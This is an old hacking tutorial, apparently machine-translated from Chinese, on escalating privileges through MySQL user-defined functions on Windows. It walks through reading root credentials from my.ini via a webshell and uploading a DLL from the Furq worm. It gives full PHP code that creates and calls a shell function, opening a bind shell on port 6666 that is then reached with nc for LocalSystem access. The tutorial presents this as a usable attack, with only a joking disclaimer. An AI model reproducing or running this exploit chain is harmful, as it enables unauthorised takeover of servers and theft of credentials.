Take the right to MySQL in the name of the security tutorial

Author Kevin
Note: The manuscript has been published in the "Hacker line of Defense" in the 7th 2005, reprint please clear the copyright and source.

Not long ago the internet disclosed a MySQL func vulnerability, talking about the use of MySQL to create a custom function, and then through this function to attack the server. The earliest reports were on O-otik, but the exploit of Unix systems was announced, and the success rate was not high. Recently, the domestic has the master release for the win system related articles, so I immediately find to work with friends to study together.
In fact, we could have thought of that. When we attack the Mssql\oracle database, we get the most privileged accounts in the database, which are often executed by special extension procedures or functions. For example, MSSQL has xp_cmdshell,oracle can create a special function by Msvcrt.dll. But we never thought, as a popular database software, one of MySQL, can also be created by the function. From this perspective, This flaw in MySQL should not be called a vulnerability but merely a technique.
After a bunch of crap, let's find out how to create a function in MySQL. This is much more important than how to use it, as long as you understand the principle, you can use it more flexibly, and you can integrate with other ideas.
The statement that creates a function in MySQL is:
Create Function functionname Returns [string| integer| Real] soname ' C:\function.dll ';
where functionname refers to the name of the function, C:\Function.DLL refers to the DLL called by the function, which is the function name in the DLL. But what we need to be aware of here is that if we need MySQL to have a parameter attached to the function, Then you have to conform to the UDF form of the program to write rules, you can view the MySQL manual in the 14th section: "For MySQL add a new function." And string,integet,real is the form of the value returned after the function is executed. Of course, we don't have to follow the UDF format, In fact, if our function uses a code that we want to execute without using parameters, we can achieve the effect of the attack, such as System ("Command.com") and so on. The Furq worm, which is now being attacked with this vulnerability, is an example of not using the UDF format. But note that This creation function statement must require us to use the MySQL account has the MySQL this database write permission, otherwise cannot use normally.
Well, after we understand the principle, let's take a look at how to use MySQL to elevate permissions.
Here we have a wide range of vulnerabilities to get a server Webshell, I am here to demonstrate the Angel Phpspy, because PHP has the default connection MySQL function, and ASP these need to use additional components to connect, not the condition itself.
Generally speaking, under the win system, many software will create a file called My.ini in the system directory, which contains very sensitive MySQL information. And if we conquer the host does not have very good permission to set, we ourselves have to%windir% directory browsing rights, So it's very easy to read the information. And very many administrators usually write the root account and password in this my.ini, so once we read the root password, we can manipulate the MySQL database or the server. Figure 1.
After getting the MySQL root password, we need to upload our DLL file, where I'm using the FurQ.dll extracted from the Furq worm. Execute the Shell function in this FurQ.DLL, the system will open a password Cmdshell on port 6666, Of course, the password we already know, is "Furq" a few characters just. But we have not yet implemented the conditions. You need to create this function in MySQL via MySQL.
Now, we use Phpspy to create a new PHP file.
Enter the following content
<?php
$link =mysql_connect (' 127.0.0.1 ', ' root ', ' root ');
if (! $link) {
Die (' could not Connect the database!: '. mysql_error ());
};
echo "Good boy.connected!<br>";
The root\root here is the user and password read from the My.ini.
@mysql_select_db (' mysql ') or Die (' use database MySQL failed! ');
echo "Yes you did!<br>";
Here you choose to use the MySQL database table. Of course you can also choose something else, such as test.
$query = "Create Function Shell RETURNS INTEGER soname ' d:\\wwwroot\\furq.dll ';";
@ $result = mysql_query ($query, $link) or Die ("Create Function failed!");
echo "Goddess ... Successed!<br> ";
These two words are key to executing the MySQL creation function statement. Create the shell functions in D:\wwwroot\furq.dll into MySQL. So that MySQL can execute this shell function.
$query = "Select Shell ();";
@ $result = mysql_query ($query, $link) or Die ("Execute failed");
echo "congratulations! Connect the Port 6666 of this Server VS password:furq<br> ";
This step is to execute this shell function and open the server's 6666 port.
?>
Execute again, all normal return. As shown in Figure 2. Now, we can use NC to connect to the server's 6666 port, enter this password: FURQ. And then returned to Cmdshell. Of course, because the successor is MySQL permissions, and win system MySQL default to service installation, that is, we get the shell for LocalSystem permissions, you can do whatever, but do not do bad things oh.